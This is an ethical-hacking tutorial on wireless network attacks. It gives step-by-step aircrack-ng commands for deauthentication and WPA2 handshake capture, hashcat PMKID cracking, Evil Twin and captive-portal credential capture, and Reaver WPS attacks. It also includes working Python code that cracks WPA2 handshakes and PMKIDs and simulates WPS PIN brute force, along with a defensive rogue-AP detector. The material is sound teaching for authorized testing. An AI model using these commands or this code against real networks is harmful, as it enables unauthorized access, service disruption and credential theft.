Ethical Hacking Wireless Network Hacking
Wireless networks broadcast data through the air. Unlike wired networks where an attacker needs physical access to a cable or switch port, Wi-Fi signals extend beyond walls, floors, and building boundaries. Anyone within radio range can attempt to intercept or join the network. Wireless security testing is a core component of many penetration tests because organizations frequently overlook the risks of their Wi-Fi infrastructure.
How Wi-Fi Works
A wireless access point (AP) broadcasts a network name called the SSID (Service Set Identifier). Devices within range discover the AP and request to associate. The AP authenticates the device, typically by having it prove knowledge of a password or, in enterprise deployments, through 802.1X, and the device then obtains an IP address (normally from a DHCP server behind the AP). All traffic then flows wirelessly between the device and the AP, which bridges it onto the wired network.
Because this communication travels over open radio waves, anyone within range with a wireless adapter in monitor mode can capture the raw 802.11 frames. With WPA2 or WPA3 the data payloads are encrypted, but management frames (beacons, probes, deauthentication), MAC addresses and the key-establishment exchange are still visible, and those are what the attacks below work with.
Wireless Security Protocols
| Protocol | Year | Status | Key Weakness |
|---|---|---|---|
| WEP | 1997 | Completely broken | RC4 implementation flaws; crackable in minutes |
| WPA | 2003 | Deprecated — weak | TKIP protocol has known vulnerabilities |
| WPA2-Personal | 2004 | Vulnerable to offline dictionary attack | A captured 4-way handshake (or PMKID) lets an attacker test password guesses offline |
| WPA2-Enterprise | 2004 | Secure when configured correctly | RADIUS server misconfiguration risks |
| WPA3 | 2018 | Current standard | Dragonblood side-channel and downgrade issues in early SAE implementations (mostly patched); WPA2/WPA3 transition mode still exposes the WPA2 attack surface |
Required Hardware for Wireless Testing
Many built-in laptop Wi-Fi adapters, or their drivers, do not support monitor mode, and fewer still support packet injection; both are needed for the captures and deauthentication described below. Ethical hackers therefore use dedicated USB wireless adapters with chipsets whose Linux drivers support monitor mode and packet injection.
Popular chipsets for wireless testing include:
- Alfa AWUS036ACH: the usual choice; long range, 2.4 GHz and 5 GHz, monitor mode and injection supported. It uses a Realtek RTL8812AU chipset and needs the out-of-tree Realtek driver, which Kali packages.
- TP-Link TL-WN722N v1: budget option, 2.4 GHz only; only v1 (Atheros AR9271 chipset) supports monitor mode and injection with the in-kernel driver; v2 and later use a different Realtek chipset.
The Aircrack-ng Suite
Aircrack-ng is the standard toolkit for wireless network testing in Kali Linux. It includes several specialized tools:
- airmon-ng — Puts the wireless adapter into monitor mode
- airodump-ng — Captures wireless packets and shows nearby networks
- aireplay-ng — Injects packets — used to deauthenticate clients and capture handshakes
- aircrack-ng: recovers WEP keys statistically from captured IVs, and WPA/WPA2 pre-shared keys from a captured handshake by testing each entry of a wordlist
Cracking WPA2-Personal: The 4-Way Handshake Attack
WPA2-Personal protects a network with a Pre-Shared Key (PSK), the Wi-Fi password. The password itself never crosses the air. Client and AP each derive the Pairwise Master Key (PMK) from the password and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations), then run a 4-way handshake in which they exchange nonces (ANonce from the AP, SNonce from the client), derive a session key (the PTK) from the PMK, the nonces and both MAC addresses, and prove possession of it with a Message Integrity Code (MIC) on handshake messages 2, 3 and 4.
An ethical hacker captures this handshake by listening passively or by sending deauthentication frames that force a connected device to reconnect. Because the nonces and MAC addresses are sent in the clear and the MIC is a keyed function of the PMK, the capture can be taken offline and each candidate password tested by recomputing the MIC, the same process as cracking a password hash. In practice a capture containing message 2 together with the ANonce (from message 1 or 3) is enough; all four messages are not required.
Step-by-Step WPA2 Handshake Capture
- Put the adapter in monitor mode (`airmon-ng check kill` first stops NetworkManager and wpa_supplicant, which otherwise keep resetting the interface):
  `airmon-ng check kill`
  `airmon-ng start wlan0`
- Scan for networks and note the target's BSSID and channel:
  `airodump-ng wlan0mon`
- Lock onto the target's channel and write a capture file:
  `airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon`
- From a second terminal, force a reconnection (deauthentication attack; it disrupts real users, so run it only against networks that are in scope):
  `aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon`
  Adding `-c <client MAC>` deauthenticates a single station instead of broadcasting to all of them.
- Wait for `WPA handshake: AA:BB:CC:DD:EE:FF` to appear in the top line of the airodump-ng output.
- Crack the handshake:
  `aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt`
If the Wi-Fi password appears in rockyou.txt or any other wordlist, aircrack-ng recovers it. The attacker's only cost per guess is one PBKDF2 computation, so for large wordlists or rule-based attacks the capture is normally converted with hcxpcapngtool and run through hashcat on a GPU. A long, random passphrase that appears in no wordlist and matches no mask survives this attack; the protocol gives the defender nothing else to lean on.
PMKID Attack
The PMKID attack is a newer method that does not require a complete 4-way handshake or even a connected client. Many access points, particularly those with roaming features such as 802.11r or opportunistic key caching enabled, include a PMKID (Pairwise Master Key Identifier) in the RSN information element of the first EAPOL message they send to a station that begins to associate, and the attacker's own adapter can trigger that message simply by starting an association. The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || station MAC), and the PMK is derived from the password and SSID, so the captured value can be cracked offline with the same wordlist approach as the handshake attack. Not every AP emits a PMKID; when the target does not, the handshake attack is the fallback.
Tools: hcxdumptool captures the exchange, hcxpcapngtool converts the capture into hashcat's 22000 format (which also covers ordinary handshakes), and hashcat cracks it:
`hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt`
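To make both derivations concrete, here is an added Python example, not from this page and not code from the Aircrack-ng or hcxtools projects, that implements the WPA2 key schedule as the standard defines it: PBKDF2 to the PMK, the 802.11i PRF to the KCK, the message-2 MIC, and the PMKID. It synthesises a capture for a constructed network (SSID "CorpGuest", made-up MAC addresses, random nonces, a known password) and then recovers the password from the handshake and from the PMKID with a small constructed wordlist. Per candidate it does exactly what aircrack-ng and `hashcat -m 22000` do, only slower.

```python
import hashlib
import hmac
import os

# EAPOL-Key frame layout (key descriptor type 2 / RSN): EAPOL header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81 bytes, then the
# 16-byte MIC, then the key-data length and key data.
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter) blocks, concatenated."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """KCK = first 16 bytes of the PTK, where for CCMP PTK = PRF-384(PMK,
    "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP) MIC: HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), carried in EAPOL message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Offline dictionary attack: recompute the message-2 MIC under each candidate PSK."""
    observed_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_msg2[:MIC_OFFSET] + bytes(16) + eapol_msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), observed_mic):
            return candidate
    return None


def crack_pmkid(ssid, ap_mac, sta_mac, observed_pmkid, wordlist):
    """Same search, but only the PMK is needed: no nonces, no client, no handshake."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_psk(candidate, ssid), ap_mac, sta_mac), observed_pmkid):
            return candidate
    return None


def make_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (no key data), used only to synthesise a capture."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # SNonce, key IV, key RSC, key ID
            + mic + b"\x00\x00")         # MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def demo(password="sunflower42", wordlist=("password", "letmein", "sunflower42", "wifi1234")):
    """Synthesise a capture for a constructed network, then recover the PSK both ways."""
    ssid = "CorpGuest"                                   # constructed network and addresses
    ap_mac, sta_mac = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566")
    anonce, snonce = os.urandom(32), os.urandom(32)
    pmk = pmk_from_psk(password, ssid)
    kck = derive_kck(pmk, ap_mac, sta_mac, anonce, snonce)
    msg2 = make_eapol_msg2(snonce, eapol_mic(kck, make_eapol_msg2(snonce)))  # client fills in MIC
    return (crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist),
            crack_pmkid(ssid, ap_mac, sta_mac, pmkid(pmk, ap_mac, sta_mac), wordlist))


if __name__ == "__main__":
    print(demo())    # ('sunflower42', 'sunflower42')
```

The MIC offset is fixed by the EAPOL-Key layout, which is why a cracker only needs message 2 and the two nonces, not the decrypted key data. `pmk_from_psk("password", "IEEE")` reproduces the PBKDF2 test vector from the 802.11i annex, a quick sanity check for any reimplementation.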
Evil Twin Attack
An Evil Twin is a rogue access point that advertises the same SSID as a legitimate network. The attacker runs it with a stronger signal than the real AP, usually combined with deauthentication of the real AP's clients, so that devices with a saved profile for that SSID reconnect to the attacker's AP instead. Two caveats matter in practice: clients only roam automatically to a twin whose security settings match their saved profile, so an open twin of a WPA2-PSK network relies on users joining it by hand (which is why it is paired with a captive portal), and a twin of a WPA2-PSK network can only complete the handshake if the attacker already knows the PSK. Enterprise (802.1X) networks are the most exposed, because a client that does not validate the RADIUS server certificate will hand its credentials to any AP with the right SSID.
Once devices connect to the Evil Twin, the attacker can:
- Capture all unencrypted traffic passing through the fake AP
- Serve a fake captive portal asking victims to "re-authenticate" to capture credentials
- Attempt a man-in-the-middle attack on HTTPS connections using SSL stripping or a forged certificate; HSTS, certificate validation and browser warnings limit this, so in practice it mostly catches sites that still answer on plain HTTP and users who click through warnings
Tools: hostapd-wpe for WPA2-Enterprise Evil Twins (it logs the EAP challenge/response pairs it receives for offline cracking); airbase-ng for basic rogue APs.
WPS Attacks
WPS (Wi-Fi Protected Setup) was designed to simplify connecting devices using an 8-digit PIN instead of a password. The external-registrar PIN exchange has a design flaw: the AP reveals whether the first four digits are correct (message M4 versus an EAP-NACK) before the rest is checked, and the eighth digit is a checksum of the other seven. Instead of testing all 100 million combinations of an 8-digit PIN, an attacker tests at most 10,000 values for the first half and 1,000 for the second, about 11,000 attempts in the worst case. Older routers with WPS enabled can be cracked in hours; many newer ones lock the PIN method after a handful of failures, which slows or stops the online attack.
Tool: Reaver or Bully
`reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -v`
Reaver's `-K` (`--pixie-dust`) option runs the offline Pixie Dust attack against APs whose WPS nonces are weakly generated, which sidesteps the online lockout entirely.
Recommendation: Disable WPS on all access points. It provides minimal convenience benefit at significant security cost.
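The arithmetic above as an added simulation, not the page's code and not Reaver's: a toy WPS registrar that, like the flawed protocol, answers the two PIN halves separately and counts the attempts it serves, a split-PIN search against it, and the same search against a registrar with a lockout. The checksum routine is the one the WPS specification defines; 12345670 is the example PIN commonly used in WPS documentation, and the lockout threshold is a made-up parameter.

```python
def wps_checksum(first_seven: int) -> int:
    """Checksum digit that the WPS spec appends to the seven chosen PIN digits."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


class Registrar:
    """Simulated WPS registrar (the AP side). Mirrors the protocol flaw: after M4 the AP
    reveals whether the first half was right, after M6 whether the second half was.
    lockout_after (made-up parameter) models APs that disable the PIN method after N failures."""

    def __init__(self, pin: str, lockout_after=None):
        assert len(pin) == 8 and pin[7] == str(wps_checksum(int(pin[:7]))), "invalid WPS PIN"
        self._pin = pin
        self.lockout_after = lockout_after
        self.attempts = 0
        self.failures = 0

    def try_pin(self, pin: str) -> str:
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            return "LOCKED"
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            self.failures += 1
            return "NACK-M4"           # first half wrong
        if pin[4:] != self._pin[4:]:
            self.failures += 1
            return "NACK-M6"           # first half right, second half wrong
        return "M7"                    # both halves right: AP now sends the network credentials


def split_pin_attack(reg: Registrar):
    """Brute force each half independently: at most 10,000 + 1,000 attempts instead of 10^8."""
    first_half = None
    for i in range(10_000):
        reply = reg.try_pin(f"{i:04d}0000")
        if reply == "LOCKED":
            return None
        if reply != "NACK-M4":         # M4 came back: the first half is right
            first_half = f"{i:04d}"
            break
    if first_half is None:
        return None
    for j in range(1_000):
        candidate = f"{first_half}{j:03d}"
        candidate += str(wps_checksum(int(candidate)))   # only 1,000 second halves are valid
        reply = reg.try_pin(candidate)
        if reply == "LOCKED":
            return None
        if reply == "M7":
            return candidate
    return None


def demo():
    """Recover the PIN from an unprotected registrar, then fail against one with a lockout."""
    open_ap = Registrar("12345670")
    hardened = Registrar("12345670", lockout_after=10)
    return split_pin_attack(open_ap), open_ap.attempts, split_pin_attack(hardened), hardened.attempts


if __name__ == "__main__":
    print(demo())    # ('12345670', 1803, None, 10)
```

Against the open registrar the PIN falls after 1,235 + 568 attempts; the worst case (PIN 99999995) takes exactly 11,000. A registrar that locks after ten failures stops the search at ten attempts, which is why the online attack is so much less reliable on current firmware and why Pixie Dust matters to testers.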
Rogue Access Point Detection
Ethical hackers also test an organization's ability to detect rogue access points set up by employees or attackers. A rogue AP plugged into an internal switch port bypasses perimeter security entirely: anyone who associates to it is on the internal network, with no firewall in the path.
Wireless intrusion prevention systems (WIPS) detect unauthorized access points by continuously monitoring the RF environment and comparing what they see against an inventory of sanctioned APs. The usual triggers are unknown SSIDs, unknown BSSIDs (AP MAC addresses), a sanctioned SSID advertised by an unsanctioned BSSID or with different security settings, and a sanctioned BSSID appearing on an unexpected channel. Correlating with wired-side data (802.1X or MAC authentication on switch ports) tells a rogue that is actually plugged in apart from a neighbour's AP that merely overlaps the building.
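An added example, neither the page's nor any WIPS vendor's code, of the comparison a WIPS makes, written in Python over a constructed sweep: an inventory of sanctioned APs, the beacons a monitor-mode sensor might have seen in one pass, and the rules that separate an Evil Twin, an unsanctioned AP on a managed SSID, a cloned BSSID, and a merely unknown network. The SSIDs, BSSIDs and signal levels are all made up.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    """One beacon frame as summarised by a monitor-mode sensor."""
    bssid: str
    ssid: str
    channel: int
    security: str   # "open", "WPA2-PSK", "WPA2-Enterprise", "WPA3-SAE"
    rssi: int       # dBm at the sensor


# Constructed inventory of sanctioned APs: SSID -> (sanctioned BSSIDs, expected security)
AUTHORIZED = {
    "CorpWiFi":  ({"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}, "WPA2-Enterprise"),
    "CorpGuest": ({"aa:bb:cc:00:00:03"}, "WPA2-PSK"),
}

# Constructed sweep: what one pass over the channels might return
SWEEP = [
    Beacon("aa:bb:cc:00:00:01", "CorpWiFi", 6, "WPA2-Enterprise", -48),
    Beacon("aa:bb:cc:00:00:02", "CorpWiFi", 36, "WPA2-Enterprise", -61),
    Beacon("aa:bb:cc:00:00:03", "CorpGuest", 11, "WPA2-PSK", -55),
    Beacon("de:ad:be:ef:00:01", "CorpWiFi", 6, "open", -35),              # Evil Twin, louder than the real AP
    Beacon("de:ad:be:ef:00:02", "CorpWiFi", 1, "WPA2-Enterprise", -70),   # unknown AP, right SSID and security
    Beacon("aa:bb:cc:00:00:01", "CorpWiFi", 11, "WPA2-Enterprise", -40),  # sanctioned BSSID cloned on another channel
    Beacon("00:11:22:33:44:55", "Linksys", 1, "open", -75),               # unknown network
    Beacon("00:11:22:33:44:66", "HomeNet", 6, "WPA2-PSK", -82),
]


def analyse(sweep, authorized):
    """Return (severity, bssid, reason) alerts, one per distinct finding."""
    channels = defaultdict(set)            # BSSID -> channels it was seen on
    strongest = {}                         # SSID -> best RSSI heard from a sanctioned BSSID
    for b in sweep:
        channels[b.bssid].add(b.channel)
        if b.ssid in authorized and b.bssid in authorized[b.ssid][0]:
            strongest[b.ssid] = max(strongest.get(b.ssid, -200), b.rssi)

    alerts = []
    for b in sweep:
        if b.ssid not in authorized:
            finding = ("INFO", b.bssid, f"unknown network {b.ssid!r}; verify it is not on the wired LAN")
        else:
            sanctioned, expected = authorized[b.ssid]
            if b.bssid not in sanctioned:
                louder = b.ssid in strongest and b.rssi > strongest[b.ssid]
                if b.security != expected:
                    finding = ("HIGH", b.bssid,
                               f"Evil Twin of {b.ssid}: advertises {b.security}, expected {expected}"
                               + (", and louder than the real AP" if louder else ""))
                else:
                    finding = ("HIGH", b.bssid, f"unsanctioned AP advertising managed SSID {b.ssid}")
            elif len(channels[b.bssid]) > 1:
                finding = ("HIGH", b.bssid,
                           f"sanctioned BSSID seen on channels {sorted(channels[b.bssid])}: possible BSSID spoofing")
            else:
                continue                   # sanctioned AP behaving as inventoried
        if finding not in alerts:          # the cloned BSSID appears twice; report it once
            alerts.append(finding)
    return alerts


if __name__ == "__main__":
    for severity, bssid, reason in analyse(SWEEP, AUTHORIZED):
        print(f"{severity:4} {bssid}  {reason}")
```

The sweep yields three HIGH findings (the open twin, the unsanctioned AP with the right SSID, and the cloned BSSID) and two INFO findings for the neighbouring networks; the two genuinely sanctioned APs produce nothing. A real WIPS adds what this cannot see from the air alone, such as whether an unknown BSSID's traffic is appearing on the wired side.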
Wireless Testing Diagram: Signal Reach Risk
Imagine a fortress with high walls (the firewall). All the gates are locked and guarded. But the Wi-Fi signal passes through the walls. From the parking lot outside, an attacker can:
- Capture handshakes without entering the building
- Crack the password and join the network from outside
- Set up an Evil Twin that employees connect to from the lobby or conference rooms
- Join the internal network with the same access as any employee device, all while sitting in a car outside; what they can reach from there depends entirely on how well the Wi-Fi segment is firewalled from the rest of the network
Wireless security testing ensures the walls of the fortress extend to the edges of the radio signal — not just the edges of the building.
Key Points
- WEP is completely broken; WPA is deprecated; WPA2-Personal is vulnerable to offline dictionary attacks against the 4-way handshake.
- Monitor mode and packet injection require a compatible USB wireless adapter — built-in laptop adapters typically do not support these modes.
- The Aircrack-ng suite covers the full WPA2 attack workflow: monitor mode, capture, deauthentication, and offline cracking.
- The PMKID attack captures crackable material from the AP alone, without waiting for a client to connect, on access points that emit a PMKID.
- Evil Twin attacks create rogue access points that intercept device connections.
- WPS should be disabled on all access points due to its PIN verification design flaw.
